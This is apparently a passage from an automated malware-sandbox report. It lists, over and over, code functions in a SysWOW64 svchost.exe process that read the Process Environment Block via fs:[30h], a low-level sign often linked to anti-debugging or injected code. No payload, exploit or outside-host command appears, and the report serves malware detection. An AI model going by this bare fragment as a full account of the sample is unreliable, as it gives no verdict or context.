                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E59C mov eax, dword ptr fs:[00000030h]1_2_03B6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov eax, dword ptr fs:[00000030h]1_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32582 mov ecx, dword ptr fs:[00000030h]1_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64588 mov eax, dword ptr fs:[00000030h]1_2_03B64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B325E0 mov eax, dword ptr fs:[00000030h]1_2_03B325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]1_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B365D0 mov eax, dword ptr fs:[00000030h]1_2_03B365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E5CF mov eax, dword ptr fs:[00000030h]1_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40535 mov eax, dword ptr fs:[00000030h]1_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E53E mov eax, dword ptr fs:[00000030h]1_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6500 mov eax, dword ptr fs:[00000030h]1_2_03BC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04500 mov eax, dword ptr fs:[00000030h]1_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6656A mov eax, dword ptr fs:[00000030h]1_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38550 mov eax, dword ptr fs:[00000030h]1_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B644B0 mov ecx, dword ptr fs:[00000030h]1_2_03B644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03BBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B364AB mov eax, dword ptr fs:[00000030h]1_2_03B364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA49A mov eax, dword ptr fs:[00000030h]1_2_03BEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B304E5 mov ecx, dword ptr fs:[00000030h]1_2_03B304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C427 mov eax, dword ptr fs:[00000030h]1_2_03B2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC460 mov ecx, dword ptr fs:[00000030h]1_2_03BBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA456 mov eax, dword ptr fs:[00000030h]1_2_03BEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2645D mov eax, dword ptr fs:[00000030h]1_2_03B2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5245A mov eax, dword ptr fs:[00000030h]1_2_03B5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]1_2_03B5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03BBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03BDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]1_2_03C04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]1_2_03B2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]1_2_03B28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]1_2_03BDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]1_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]1_2_03BD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]1_2_03B86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]1_2_03B68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]1_2_03C04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]1_2_03B30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]1_2_03B6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]1_2_03B5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]1_2_03BBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]1_2_03BDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03BBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]1_2_03B649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03BFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]1_2_03BC69C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
